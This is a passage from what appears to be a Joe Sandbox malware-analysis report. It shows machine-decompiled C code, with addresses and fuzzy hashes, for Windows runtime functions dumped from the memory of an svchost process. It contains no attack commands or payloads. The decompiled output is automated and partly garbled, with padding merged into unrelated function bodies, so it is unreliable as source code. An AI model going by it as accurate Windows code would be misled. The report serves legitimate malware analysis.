							 *0x311b1e0( *((intOrPtr*)(_t34 + 0x30)),  *((intOrPtr*)(_t34 + 0x18)),  *((intOrPtr*)(_t34 + 0x20)), _t34);
							_v12();
						}
					}
					goto L9;
				}
				_t19 = 0;
				goto L2;
			}


















                        0x0302c96a
                        0x0302c974
                        0x0302c988
                        0x0302c98a
                        0x03097c9d
                        0x03097c9f
                        0x03097ca4
                        0x03097cae
                        0x03097cf0
                        0x03097cf5
                        0x03097cfa
                        0x0302c992
                        0x0302c996
                        0x0302c997
                        0x0302c998
                        0x0302c9a3
                        0x0302c9a3
                        0x03097cb0
                        0x03097cb7
                        0x03097cbb
                        0x00000000
                        0x00000000
                        0x03097cbd
                        0x03097ce8
                        0x03097cc5
                        0x03097cc8
                        0x03097cca
                        0x03097cd0
                        0x03097cd6
                        0x03097cde
                        0x03097ce4
                        0x03097ce4
                        0x03097cd0
                        0x00000000
                        0x03097ce8
                        0x0302c990
                        0x00000000

                        Memory Dump Source
                        • Source File: 00000011.00000002.514140723.0000000003000000.00000040.00000800.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                        • Associated: 00000011.00000002.514645489.000000000311B000.00000040.00000800.00020000.00000000.sdmpDownload File
                        • Associated: 00000011.00000002.514664363.000000000311F000.00000040.00000800.00020000.00000000.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_3000000_svchost.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 786ff7ea8730893158926880f4859b8b319114373685705c522084ef9054e0e6
                        • Instruction ID: 51c712f734173da10eb835de1fb5e6b41ef18bab2fd1b3b14a08e2e0271f2673
                        • Opcode Fuzzy Hash: 786ff7ea8730893158926880f4859b8b319114373685705c522084ef9054e0e6
                        • Instruction Fuzzy Hash: 8511E1723117069BDB50EF28ED85AABB7E9BFC9A10B04063EF84597690DB20EC50D7D1
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 030637F5 Relevance: .1, Instructions: 57COMMON
                        Download Yara Rule
                        C-Code - Quality: 87%
                        			E030637F5(void* __ecx, intOrPtr* __edx) {
				void* __ebx;
				void* __edi;
				signed char _t6;
				intOrPtr _t13;
				intOrPtr* _t20;
				intOrPtr* _t27;
				void* _t28;
				intOrPtr* _t29;

				_t27 = __edx;
				_t28 = __ecx;
				if(__edx == 0) {
					E03042280(_t6, 0x3118550);
				}
				_t29 = E0306387E(_t28);
				if(_t29 == 0) {
					L6:
					if(_t27 == 0) {
						E0303FFB0(0x3118550, _t27, 0x3118550);
					}
					if(_t29 == 0) {
						return 0xc0000225;
					} else {
						if(_t27 != 0) {
							goto L14;
						}
						L030477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t27, _t29);
						goto L11;
					}
				} else {
					_t13 =  *_t29;
					if( *((intOrPtr*)(_t13 + 4)) != _t29) {
						L13:
						_push(3);
						asm("int 0x29");
						L14:
						 *_t27 = _t29;
						L11:
						return 0;
					}
					_t20 =  *((intOrPtr*)(_t29 + 4));
					if( *_t20 != _t29) {
						goto L13;
					}
					 *_t20 = _t13;
					 *((intOrPtr*)(_t13 + 4)) = _t20;
					asm("btr eax, ecx");
					goto L6;
				}
			}











                        0x030637fa
                        0x030637fc
                        0x03063805
                        0x03063808
                        0x03063808
                        0x03063814
                        0x03063818
                        0x03063846
                        0x03063848
                        0x0306384b
                        0x0306384b
                        0x03063852
                        0x00000000
                        0x03063854
                        0x03063856
                        0x00000000
                        0x00000000
                        0x03063863
                        0x00000000
                        0x03063863
                        0x0306381a
                        0x0306381a
                        0x0306381f
                        0x0306386e
                        0x0306386e
                        0x03063871
                        0x03063873
                        0x03063873
                        0x03063868
                        0x00000000
                        0x03063868
                        0x03063821
                        0x03063826
                        0x00000000
                        0x00000000
                        0x03063828
                        0x0306382a
                        0x03063841
                        0x00000000
                        0x03063841

                        Memory Dump Source
                        • Source File: 00000011.00000002.514140723.0000000003000000.00000040.00000800.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                        • Associated: 00000011.00000002.514645489.000000000311B000.00000040.00000800.00020000.00000000.sdmpDownload File
                        • Associated: 00000011.00000002.514664363.000000000311F000.00000040.00000800.00020000.00000000.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_3000000_svchost.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: d6eff03ec9ce552c543e0d063050656b7a5e7fcf8d41d07f418603c75a35eb40
                        • Instruction ID: 8e23b14ae94353576978c575ed01f3686bc846af98e5b6339b5d9bc6523ef8b6
                        • Opcode Fuzzy Hash: d6eff03ec9ce552c543e0d063050656b7a5e7fcf8d41d07f418603c75a35eb40
                        • Instruction Fuzzy Hash: 020108B99037105FC367CA199A00AAABBEADFC6A5071954E9E8058B228C730C800C7D0
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 0305002D Relevance: .1, Instructions: 55COMMON
                        Download Yara Rule
                        C-Code - Quality: 100%
                        			E0305002D() {
				void* _t11;
				char* _t14;
				signed char* _t16;
				char* _t27;
				signed char* _t29;

				_t11 = E03047D50();
				_t27 = 0x7ffe0384;
				if(_t11 != 0) {
					_t14 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
				} else {
					_t14 = 0x7ffe0384;
				}
				_t29 = 0x7ffe0385;
				if( *_t14 != 0) {
					if(E03047D50() == 0) {
						_t16 = 0x7ffe0385;
					} else {
						_t16 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
					}
					if(( *_t16 & 0x00000040) != 0) {
						goto L18;
					} else {
						goto L3;
					}
				} else {
					L3:
					if(E03047D50() != 0) {
						_t27 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
					}
					if( *_t27 != 0) {
						if(( *( *[fs:0x30] + 0x240) & 0x00000004) == 0) {
							goto L5;
						}
						if(E03047D50() != 0) {
							_t29 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
						}
						if(( *_t29 & 0x00000020) == 0) {
							goto L5;
						}
						L18:
						return 1;
					} else {
						L5:
						return 0;
					}
				}
			}








                        0x03050032
                        0x03050037
                        0x03050043
                        0x03094b3a
                        0x03050049
                        0x03050049
                        0x03050049
                        0x0305004e
                        0x03050053
                        0x03094b48
                        0x03094b5a
                        0x03094b4a
                        0x03094b53
                        0x03094b53
                        0x03094b5f
                        0x00000000
                        0x03094b61
                        0x00000000
                        0x03094b61
                        0x03050059
                        0x03050059
                        0x03050060
                        0x03094b6f
                        0x03094b6f
                        0x03050069
                        0x03094b83
                        0x00000000
                        0x00000000
                        0x03094b90
                        0x03094b9b
                        0x03094b9b
                        0x03094ba4
                        0x00000000
                        0x00000000
                        0x03094baa
                        0x00000000
                        0x0305006f
                        0x0305006f
                        0x00000000
                        0x0305006f
                        0x03050069

                        Memory Dump Source
                        • Source File: 00000011.00000002.514140723.0000000003000000.00000040.00000800.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                        • Associated: 00000011.00000002.514645489.000000000311B000.00000040.00000800.00020000.00000000.sdmpDownload File
                        • Associated: 00000011.00000002.514664363.000000000311F000.00000040.00000800.00020000.00000000.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_3000000_svchost.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 8d774e958955e2a4888292503cae141afd510c2672050b36ba74763b54e4c63a
                        • Instruction ID: fba338151c0a4b78510820f671456e9e2339a221a5ac9b5ea67a6ae9dec8be0d
                        • Opcode Fuzzy Hash: 8d774e958955e2a4888292503cae141afd510c2672050b36ba74763b54e4c63a
                        • Instruction Fuzzy Hash: 431126722076809FEB62DB29C944B3A77E8EF80B54F0D04F1ED148B692D329D842D660
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 0303766D Relevance: .1, Instructions: 54COMMON
                        Download Yara Rule
                        C-Code - Quality: 94%
                        			E0303766D(void* __ecx, signed int __edx, signed int _a4, signed int _a8, signed int _a12, intOrPtr* _a16) {
				char _v8;
				void* _t22;
				void* _t24;
				intOrPtr _t29;
				intOrPtr* _t30;
				void* _t42;
				intOrPtr _t47;

				_push(__ecx);
				_t36 =  &_v8;
				if(E0305F3D5( &_v8, __edx * _a4, __edx * _a4 >> 0x20) < 0) {
					L10:
					_t22 = 0;
				} else {
					_t24 = _v8 + __ecx;
					_t42 = _t24;
					if(_t24 < __ecx) {
						goto L10;
					} else {
						if(E0305F3D5( &_v8, _a8 * _a12, _a8 * _a12 >> 0x20) < 0) {
							goto L10;
						} else {
							_t29 = _v8 + _t42;
							if(_t29 < _t42) {
								goto L10;
							} else {
								_t47 = _t29;
								_t30 = _a16;
								if(_t30 != 0) {
									 *_t30 = _t47;
								}
								if(_t47 == 0) {
									goto L10;
								} else {
									_t22 = L03044620(_t36,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t47);
								}
							}
						}
					}
				}
				return _t22;
			}










                        0x03037672
                        0x0303767f
                        0x03037689
                        0x030376de
                        0x030376de
                        0x0303768b
                        0x03037691
                        0x03037693
                        0x03037697
                        0x00000000
                        0x03037699
                        0x030376a8
                        0x00000000
                        0x030376aa
                        0x030376ad
                        0x030376b1
                        0x00000000
                        0x030376b3
                        0x030376b3
                        0x030376b5
                        0x030376ba
                        0x030376bc
                        0x030376bc
                        0x030376c0
                        0x00000000
                        0x030376c2
                        0x030376ce
                        0x030376ce
                        0x030376c0
                        0x030376b1
                        0x030376a8
                        0x03037697
                        0x030376d9

                        Memory Dump Source
                        • Source File: 00000011.00000002.514140723.0000000003000000.00000040.00000800.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                        • Associated: 00000011.00000002.514645489.000000000311B000.00000040.00000800.00020000.00000000.sdmpDownload File
                        • Associated: 00000011.00000002.514664363.000000000311F000.00000040.00000800.00020000.00000000.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_3000000_svchost.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 0f0f9780e106b949b133bc76075252866a2fc865c05abd63e27a9356099b865c
                        • Instruction ID: fc2281a61b2367a1b25198a0761c534316a520e1d08e0c0bc0100723b0e4b523
                        • Opcode Fuzzy Hash: 0f0f9780e106b949b133bc76075252866a2fc865c05abd63e27a9356099b865c
                        • Instruction Fuzzy Hash: 010188B2742119ABD730DE5ECC51E9FB7ADEB85A60B140524B908CF250DA30DD0187A0
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 03029080 Relevance: .1, Instructions: 53COMMON
                        Download Yara Rule
                        C-Code - Quality: 69%
                        			E03029080(void* __ebx, intOrPtr* __ecx, void* __edi, void* __esi) {
				intOrPtr* _t51;
				intOrPtr _t59;
				signed int _t64;
				signed int _t67;
				signed int* _t71;
				signed int _t74;
				signed int _t77;
				signed int _t82;
				intOrPtr* _t84;
				void* _t85;
				intOrPtr* _t87;
				void* _t94;
				signed int _t95;
				intOrPtr* _t97;
				signed int _t99;
				signed int _t102;
				void* _t104;

				_push(__ebx);
				_push(__esi);
				_push(__edi);
				_t97 = __ecx;
				_t102 =  *(__ecx + 0x14);
				if((_t102 & 0x02ffffff) == 0x2000000) {
					_t102 = _t102 | 0x000007d0;
				}
				_t48 =  *[fs:0x30];
				if( *((intOrPtr*)( *[fs:0x30] + 0x64)) == 1) {
					_t102 = _t102 & 0xff000000;
				}
				_t80 = 0x31185ec;
				E03042280(_t48, 0x31185ec);
				_t51 =  *_t97 + 8;
				if( *_t51 != 0) {
					L6:
					return E0303FFB0(_t80, _t97, _t80);
				} else {
					 *(_t97 + 0x14) = _t102;
					_t84 =  *0x311538c; // 0x77496848
					if( *_t84 != 0x3115388) {
						_t85 = 3;
						asm("int 0x29");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						_push(0x2c);
						_push(0x30ff6e8);
						E0307D0E8(0x31185ec, _t97, _t102);
						 *((char*)(_t104 - 0x1d)) = 0;
						_t99 =  *(_t104 + 8);
						__eflags = _t99;
						if(_t99 == 0) {
							L13:
							__eflags =  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28));
							if(__eflags == 0) {
								E030F88F5(_t80, _t85, 0x3115388, _t99, _t102, __eflags);
							}
						} else {
							__eflags = _t99 -  *0x31186c0; // 0x2801228
							if(__eflags == 0) {
								goto L13;
							} else {
								__eflags = _t99 -  *0x31186b8; // 0x0
								if(__eflags == 0) {
									goto L13;
								} else {
									_t59 =  *((intOrPtr*)( *[fs:0x30] + 0xc));
									__eflags =  *((char*)(_t59 + 0x28));
									if( *((char*)(_t59 + 0x28)) == 0) {
										E03042280(_t99 + 0xe0, _t99 + 0xe0);
										 *(_t104 - 4) =  *(_t104 - 4) & 0x00000000;
										__eflags =  *((char*)(_t99 + 0xe5));
										if(__eflags != 0) {
											E030F88F5(0x31185ec, _t85, 0x3115388, _t99, _t102, __eflags);
										} else {
											__eflags =  *((char*)(_t99 + 0xe4));
											if( *((char*)(_t99 + 0xe4)) == 0) {
												 *((char*)(_t99 + 0xe4)) = 1;
												_push(_t99);
												_push( *((intOrPtr*)(_t99 + 0x24)));
												E0306AFD0();
											}
											while(1) {
												_t71 = _t99 + 8;
												 *(_t104 - 0x2c) = _t71;
												_t80 =  *_t71;
												_t95 = _t71[1];
												 *(_t104 - 0x28) = _t80;
												 *(_t104 - 0x24) = _t95;
												while(1) {
													L19:
													__eflags = _t95;
													if(_t95 == 0) {
														break;
													}
													_t102 = _t80;
													 *(_t104 - 0x30) = _t95;
													 *(_t104 - 0x24) = _t95 - 1;
													asm("lock cmpxchg8b [edi]");
													_t80 = _t102;
													 *(_t104 - 0x28) = _t80;
													 *(_t104 - 0x24) = _t95;
													__eflags = _t80 - _t102;
													_t99 =  *(_t104 + 8);
													if(_t80 != _t102) {
														continue;
													} else {
														__eflags = _t95 -  *(_t104 - 0x30);
														if(_t95 !=  *(_t104 - 0x30)) {
															continue;
														} else {
															__eflags = _t95;
															if(_t95 != 0) {
																_t74 = 0;
																 *(_t104 - 0x34) = 0;
																_t102 = 0;
																__eflags = 0;
																while(1) {
																	 *(_t104 - 0x3c) = _t102;
																	__eflags = _t102 - 3;
																	if(_t102 >= 3) {
																		break;
																	}
																	__eflags = _t74;
																	if(_t74 != 0) {
																		L49:
																		_t102 =  *_t74;
																		__eflags = _t102;
																		if(_t102 != 0) {
																			_t102 =  *(_t102 + 4);
																			__eflags = _t102;
																			if(_t102 != 0) {
																				 *0x311b1e0(_t74, _t99);
																				 *_t102();
																			}
																		}
																		do {
																			_t71 = _t99 + 8;
																			 *(_t104 - 0x2c) = _t71;
																			_t80 =  *_t71;
																			_t95 = _t71[1];
																			 *(_t104 - 0x28) = _t80;
																			 *(_t104 - 0x24) = _t95;
																			goto L19;
																		} while (_t74 == 0);
																		goto L49;
																	} else {
																		_t82 = 0;
																		__eflags = 0;
																		while(1) {
																			 *(_t104 - 0x38) = _t82;
																			__eflags = _t82 -  *0x31184c0;
																			if(_t82 >=  *0x31184c0) {
																				break;
																			}
																			__eflags = _t74;
																			if(_t74 == 0) {
																				_t77 = E030F9063(_t82 * 0xc +  *((intOrPtr*)(_t99 + 0x10 + _t102 * 4)), _t95, _t99);
																				__eflags = _t77;
																				if(_t77 == 0) {
																					_t74 = 0;
																					__eflags = 0;
																				} else {
																					_t74 = _t77 + 0xfffffff4;
																				}
																				 *(_t104 - 0x34) = _t74;
																				_t82 = _t82 + 1;
																				continue;
																			}
																			break;
																		}
																		_t102 = _t102 + 1;
																		continue;
																	}
																	goto L20;
																}
																__eflags = _t74;
															}
														}
													}
													break;
												}
												L20:
												 *((intOrPtr*)(_t99 + 0xf4)) =  *((intOrPtr*)(_t104 + 4));
												 *((char*)(_t99 + 0xe5)) = 1;
												 *((char*)(_t104 - 0x1d)) = 1;
												goto L21;
											}
										}
										L21:
										 *(_t104 - 4) = 0xfffffffe;
										E0302922A(_t99);
										_t64 = E03047D50();
										__eflags = _t64;
										if(_t64 != 0) {
											_t67 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
										} else {
											_t67 = 0x7ffe0386;
										}
										__eflags =  *_t67;
										if( *_t67 != 0) {
											_t67 = E030F8B58(_t99);
										}
										__eflags =  *((char*)(_t104 - 0x1d));
										if( *((char*)(_t104 - 0x1d)) != 0) {
											__eflags = _t99 -  *0x31186c0; // 0x2801228
											if(__eflags != 0) {
												__eflags = _t99 -  *0x31186b8; // 0x0
												if(__eflags == 0) {
													_t94 = 0x31186bc;
													_t87 = 0x31186b8;
													goto L27;
												} else {
													__eflags = _t67 | 0xffffffff;
													asm("lock xadd [edi], eax");
													if(__eflags == 0) {
														E03029240(_t80, _t99, _t99, _t102, __eflags);
													}
												}
											} else {
												_t94 = 0x31186c4;
												_t87 = 0x31186c0;
												L27:
												E03059B82(_t80, _t87, _t94, _t99, _t102, __eflags);
											}
										}
									} else {
										goto L13;
									}
								}
							}
						}
						return E0307D130(_t80, _t99, _t102);
					} else {
						 *_t51 = 0x3115388;
						 *((intOrPtr*)(_t51 + 4)) = _t84;
						 *_t84 = _t51;
						 *0x311538c = _t51;
						goto L6;
					}
				}
			}




















                        0x03029082
                        0x03029083
                        0x03029084
                        0x03029085
                        0x03029087
                        0x03029096
                        0x03029098
                        0x03029098
                        0x0302909e
                        0x030290a8
                        0x030290e7
                        0x030290e7
                        0x030290aa
                        0x030290b0
                        0x030290b7
                        0x030290bd
                        0x030290dd
                        0x030290e6
                        0x030290bf
                        0x030290bf
                        0x030290c7
                        0x030290cf
                        0x030290f1
                        0x030290f2
                        0x030290f4
                        0x030290f5
                        0x030290f6
                        0x030290f7
                        0x030290f8
                        0x030290f9
                        0x030290fa
                        0x030290fb
                        0x030290fc
                        0x030290fd
                        0x030290fe
                        0x030290ff
                        0x03029100
                        0x03029102
                        0x03029107
                        0x0302910c
                        0x03029110
                        0x03029113
                        0x03029115
                        0x03029136
                        0x0302913f
                        0x03029143
                        0x030837e4
                        0x030837e4
                        0x03029117
                        0x03029117
                        0x0302911d
                        0x00000000
                        0x0302911f
                        0x0302911f
                        0x03029125
                        0x00000000
                        0x03029127
                        0x0302912d
                        0x03029130
                        0x03029134
                        0x03029158
                        0x0302915d
                        0x03029161
                        0x03029168
                        0x03083715
                        0x0302916e
                        0x0302916e
                        0x03029175
                        0x03029177
                        0x0302917e
                        0x0302917f
                        0x03029182
                        0x03029182
                        0x03029187
                        0x03029187
                        0x0302918a
                        0x0302918d
                        0x0302918f
                        0x03029192
                        0x03029195
                        0x03029198
                        0x03029198
                        0x03029198
                        0x0302919a
                        0x00000000
                        0x00000000
                        0x0308371f
                        0x03083721
                        0x03083727
                        0x0308372f
                        0x03083733
                        0x03083735
                        0x03083738
                        0x0308373b
                        0x0308373d
                        0x03083740
                        0x00000000
                        0x03083746
                        0x03083746
                        0x03083749
                        0x00000000
                        0x0308374f
                        0x0308374f
                        0x03083751
                        0x03083757
                        0x03083759
                        0x0308375c
                        0x0308375c
                        0x0308375e
                        0x0308375e
                        0x03083761
                        0x03083764
                        0x00000000
                        0x00000000
                        0x03083766
                        0x03083768
                        0x030837a3
                        0x030837a3
                        0x030837a5
                        0x030837a7
                        0x030837ad
                        0x030837b0
                        0x030837b2
                        0x030837bc
                        0x030837c2
                        0x030837c2
                        0x030837b2
                        0x03029187
                        0x03029187
                        0x0302918a
                        0x0302918d
                        0x0302918f
                        0x03029192
                        0x03029195
                        0x00000000
                        0x03029195
                        0x00000000
                        0x0308376a
                        0x0308376a
                        0x0308376a
                        0x0308376c
                        0x0308376c
                        0x0308376f
                        0x03083775
                        0x00000000
                        0x00000000
                        0x03083777
                        0x03083779
                        0x03083782
                        0x03083787
                        0x03083789
                        0x03083790
                        0x03083790
                        0x0308378b
                        0x0308378b
                        0x0308378b
                        0x03083792
                        0x03083795
                        0x00000000
                        0x03083795
                        0x00000000
                        0x03083779
                        0x03083798
                        0x00000000
                        0x03083798
                        0x00000000
                        0x03083768
                        0x0308379b
                        0x0308379b
                        0x03083751
                        0x03083749
                        0x00000000
                        0x03083740
                        0x030291a0
                        0x030291a3
                        0x030291a9
                        0x030291b0
                        0x00000000
                        0x030291b0
                        0x03029187
                        0x030291b4
                        0x030291b4
                        0x030291bb
                        0x030291c0
                        0x030291c5
                        0x030291c7
                        0x030837da
                        0x030291cd
                        0x030291cd
                        0x030291cd
                        0x030291d2
                        0x030291d5
                        0x03029239
                        0x03029239
                        0x030291d7
                        0x030291db
                        0x030291e1
                        0x030291e7
                        0x030291fd
                        0x03029203
                        0x0302921e
                        0x03029223
                        0x00000000
                        0x03029205
                        0x03029205
                        0x03029208
                        0x0302920c
                        0x03029214
                        0x03029214
                        0x0302920c
                        0x030291e9
                        0x030291e9
                        0x030291ee
                        0x030291f3
                        0x030291f3
                        0x030291f3
                        0x030291e7
                        0x00000000
                        0x00000000
                        0x00000000
                        0x03029134
                        0x03029125
                        0x0302911d
                        0x0302914e
                        0x030290d1
                        0x030290d1
                        0x030290d3
                        0x030290d6
                        0x030290d8
                        0x00000000
                        0x030290d8
                        0x030290cf

                        Memory Dump Source
                        • Source File: 00000011.00000002.514140723.0000000003000000.00000040.00000800.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                        • Associated: 00000011.00000002.514645489.000000000311B000.00000040.00000800.00020000.00000000.sdmpDownload File
                        • Associated: 00000011.00000002.514664363.000000000311F000.00000040.00000800.00020000.00000000.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_3000000_svchost.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 5eff09b7df99717c9beadf8fd9ebed4f257d86009ca62966e1315ea0d6c9d628
                        • Instruction ID: 70bbcaae219d0664aff67bf415af1b3f6b97bf515e1aa9ffdcbb24318e602324
                        • Opcode Fuzzy Hash: 5eff09b7df99717c9beadf8fd9ebed4f257d86009ca62966e1315ea0d6c9d628
                        • Instruction Fuzzy Hash: E101F4726122188FC318DF04D980B51BBE9EF86320F254576E501DF691C370DC91CBA0
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 030BC450 Relevance: .1, Instructions: 53COMMON
                        Download Yara Rule
                        C-Code - Quality: 46%
                        			E030BC450(intOrPtr* _a4) {
				signed char _t25;
				intOrPtr* _t26;
				intOrPtr* _t27;

				_t26 = _a4;
				_t25 =  *(_t26 + 0x10);
				if((_t25 & 0x00000003) != 1) {
					_push(0);
					_push(0);
					_push(0);
					_push( *((intOrPtr*)(_t26 + 8)));
					_push(0);
					_push( *_t26);
					E03069910();
					_t25 =  *(_t26 + 0x10);
				}
				if((_t25 & 0x00000001) != 0) {
					_push(4);
					_t7 = _t26 + 4; // 0x4
					_t27 = _t7;
					_push(_t27);
					_push(5);
					_push(0xfffffffe);
					E030695B0();
					if( *_t27 != 0) {
						_push( *_t27);
						E030695D0();
					}
				}
				_t8 = _t26 + 0x14; // 0x14
				if( *((intOrPtr*)(_t26 + 8)) != _t8) {
					L030477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0,  *((intOrPtr*)(_t26 + 8)));
				}
				_push( *_t26);
				E030695D0();
				return L030477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t26);
			}






                        0x030bc458
                        0x030bc45d
                        0x030bc466
                        0x030bc468
                        0x030bc469
                        0x030bc46a
                        0x030bc46b
                        0x030bc46e
                        0x030bc46f
                        0x030bc471
                        0x030bc476
                        0x030bc476
                        0x030bc47c
                        0x030bc47e
                        0x030bc480
                        0x030bc480
                        0x030bc483
                        0x030bc484
                        0x030bc486
                        0x030bc488
                        0x030bc48f
                        0x030bc491
                        0x030bc493
                        0x030bc493
                        0x030bc48f
                        0x030bc498
                        0x030bc49e
                        0x030bc4ad
                        0x030bc4ad
                        0x030bc4b2
                        0x030bc4b4
                        0x030bc4cd

                        Memory Dump Source
                        • Source File: 00000011.00000002.514140723.0000000003000000.00000040.00000800.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                        • Associated: 00000011.00000002.514645489.000000000311B000.00000040.00000800.00020000.00000000.sdmpDownload File
                        • Associated: 00000011.00000002.514664363.000000000311F000.00000040.00000800.00020000.00000000.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_3000000_svchost.jbxd
                        Similarity
                        • API ID: InitializeThunk
                        • String ID:
                        • API String ID: 2994545307-0
                        • Opcode ID: efb8dbafbc21be99c6828cd6b94329c97088fdc8e1727ade4875afce538aa955
                        • Instruction ID: acddc3796378a205f6214e93a732b0c6b46e7cca68899e946917ca0b3ba31320
                        • Opcode Fuzzy Hash: efb8dbafbc21be99c6828cd6b94329c97088fdc8e1727ade4875afce538aa955
                        • Instruction Fuzzy Hash: 7F016D76141605BFE621EF65CD90EA2F77DFF94790B044525F21446960CB31ADA1CAA0
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 030F4015 Relevance: .0, Instructions: 49COMMON
                        Download Yara Rule
                        C-Code - Quality: 86%
                        			E030F4015(signed int __eax, signed int __ecx) {
				void* __ebx;
				void* __edi;
				signed char _t10;
				signed int _t28;

				_push(__ecx);
				_t28 = __ecx;
				asm("lock xadd [edi+0x24], eax");
				_t10 = (__eax | 0xffffffff) - 1;
				if(_t10 == 0) {
					_t1 = _t28 + 0x1c; // 0x1e
					E03042280(_t10, _t1);
					 *((intOrPtr*)(_t28 + 0x20)) =  *((intOrPtr*)( *[fs:0x18] + 0x24));
					E03042280( *((intOrPtr*)( *[fs:0x18] + 0x24)), 0x31186ac);
					E0302F900(0x31186d4, _t28);
					E0303FFB0(0x31186ac, _t28, 0x31186ac);
					 *((intOrPtr*)(_t28 + 0x20)) = 0;
					E0303FFB0(0, _t28, _t1);
					_t18 =  *((intOrPtr*)(_t28 + 0x94));
					if( *((intOrPtr*)(_t28 + 0x94)) != 0) {
						L030477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t18);
					}
					_t10 = L030477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t28);
				}
				return _t10;
			}







                        0x030f401a
                        0x030f401e
                        0x030f4023
                        0x030f4028
                        0x030f4029
                        0x030f402b
                        0x030f402f
                        0x030f4043
                        0x030f4046
                        0x030f4051
                        0x030f4057
                        0x030f405f
                        0x030f4062
                        0x030f4067
                        0x030f406f
                        0x030f407c
                        0x030f407c
                        0x030f408c
                        0x030f408c
                        0x030f4097

                        Memory Dump Source
                        • Source File: 00000011.00000002.514140723.0000000003000000.00000040.00000800.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                        • Associated: 00000011.00000002.514645489.000000000311B000.00000040.00000800.00020000.00000000.sdmpDownload File
                        • Associated: 00000011.00000002.514664363.000000000311F000.00000040.00000800.00020000.00000000.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_3000000_svchost.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 0cb4ce8b564c908d64a2858c82f3af6898da1b6b2a3f4fec6d223a8aca27c0d1
                        • Instruction ID: b617edd4d3c31fcd06799cfd3c9491f17bfa3151a18558daa93aade6f7850de3
                        • Opcode Fuzzy Hash: 0cb4ce8b564c908d64a2858c82f3af6898da1b6b2a3f4fec6d223a8aca27c0d1
                        • Instruction Fuzzy Hash: A40184B56026497FC251EB69CE80E97B7ACEF89650B000625F6088BA11CB34ED11C6E4
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 030E138A Relevance: .0, Instructions: 48COMMON
                        Download Yara Rule
                        C-Code - Quality: 61%
                        			E030E138A(intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				short _v54;
				char _v60;
				void* __edi;
				void* __esi;
				signed char* _t21;
				intOrPtr _t27;
				intOrPtr _t33;
				intOrPtr _t34;
				signed int _t35;

				_t32 = __edx;
				_t27 = __ebx;
				_v8 =  *0x311d360 ^ _t35;
				_t33 = __edx;
				_t34 = __ecx;
				E0306FA60( &_v60, 0, 0x30);
				_v20 = _a4;
				_v16 = _a8;
				_v28 = _t34;
				_v24 = _t33;
				_v54 = 0x1033;
				if(E03047D50() == 0) {
					_t21 = 0x7ffe0388;
				} else {
					_t21 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
				}
				_push( &_v60);
				_push(0x10);
				_push(0x20402);
				_push( *_t21 & 0x000000ff);
				return E0306B640(E03069AE0(), _t27, _v8 ^ _t35, _t32, _t33, _t34);
			}

















                        0x030e138a
                        0x030e138a
                        0x030e1399
                        0x030e13a3
                        0x030e13a8
                        0x030e13aa
                        0x030e13b5
                        0x030e13bb
                        0x030e13c3
                        0x030e13c6
                        0x030e13c9
                        0x030e13d4
                        0x030e13e6
                        0x030e13d6
                        0x030e13df
                        0x030e13df
                        0x030e13f1
                        0x030e13f2
                        0x030e13f4
                        0x030e13f9
                        0x030e140e

                        Memory Dump Source
                        • Source File: 00000011.00000002.514140723.0000000003000000.00000040.00000800.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                        • Associated: 00000011.00000002.514645489.000000000311B000.00000040.00000800.00020000.00000000.sdmpDownload File
                        • Associated: 00000011.00000002.514664363.000000000311F000.00000040.00000800.00020000.00000000.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_3000000_svchost.jbxd
                        Similarity
